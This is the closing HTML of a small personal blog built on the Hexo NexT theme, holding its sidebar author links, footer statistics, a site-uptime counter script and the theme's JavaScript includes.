      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt=""
      src="/images/avatar.png.jpg">
  <p class="site-author-name" itemprop="name"></p>
  <div class="site-description" itemprop="description">Welcome to the 1/30000 🫧</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">5</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://stackoverflow.com/yourname" title="StackOverflow → https:&#x2F;&#x2F;stackoverflow.com&#x2F;yourname" rel="noopener" target="_blank"><i class="fab fa-stack-overflow fa-fw"></i>StackOverflow</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://github.com/acindm" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;acindm" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:acindd@yeah.net" title="E-Mail → mailto:acindd@yeah.net" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://twitter.com/yourname" title="Twitter(X) → https:&#x2F;&#x2F;twitter.com&#x2F;yourname" rel="noopener" target="_blank"><i class="fab fa-twitter fa-fw"></i>Twitter(X)</a>
      </span>
  </div>



      </div>
        <div class="back-to-top motion-element">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder"></span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
      <span class="post-meta-item-text">站点总字数：</span>
    <span title="站点总字数">5k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span class="post-meta-item-text">站点阅读时长 &asymp;</span>
    <span title="站点阅读时长">19 分钟</span>
</div>

<!-- <br /> -->
<!-- 网站运行时间的设置 -->
<span id="timeDate">载入天数...</span>
<!-- <span id="times">载入时分秒...</span> -->
<script>
    var now = new Date();
    function createtime() {
        var grt= new Date("10/8/2023 2:00:00");//此处修改你的建站时间或者网站上线时间
        now.setTime(now.getTime()+250);
        days = (now - grt ) / 1000 / 60 / 60 / 24; dnum = Math.floor(days);
        hours = (now - grt ) / 1000 / 60 / 60 - (24 * dnum); hnum = Math.floor(hours);
        if(String(hnum).length ==1 ){hnum = "0" + hnum;} minutes = (now - grt ) / 1000 /60 - (24 * 60 * dnum) - (60 * hnum);
        mnum = Math.floor(minutes); if(String(mnum).length ==1 ){mnum = "0" + mnum;}
        seconds = (now - grt ) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum);
        snum = Math.round(seconds); 
        if(String(snum).length ==1 ){snum = "0" + snum;}
        // var times = document.getElementById("times").innerHTML = hnum + " 小时 " + mnum + " 分 " + snum + " 秒";
        document.getElementById("timeDate").innerHTML = " 👾营业已经："+dnum+" 天 "+hnum + " 时 " + mnum + " 分 " + snum + " 秒";
    }
setInterval("createtime()",250);
</script>


        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/lozad@1/dist/lozad.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
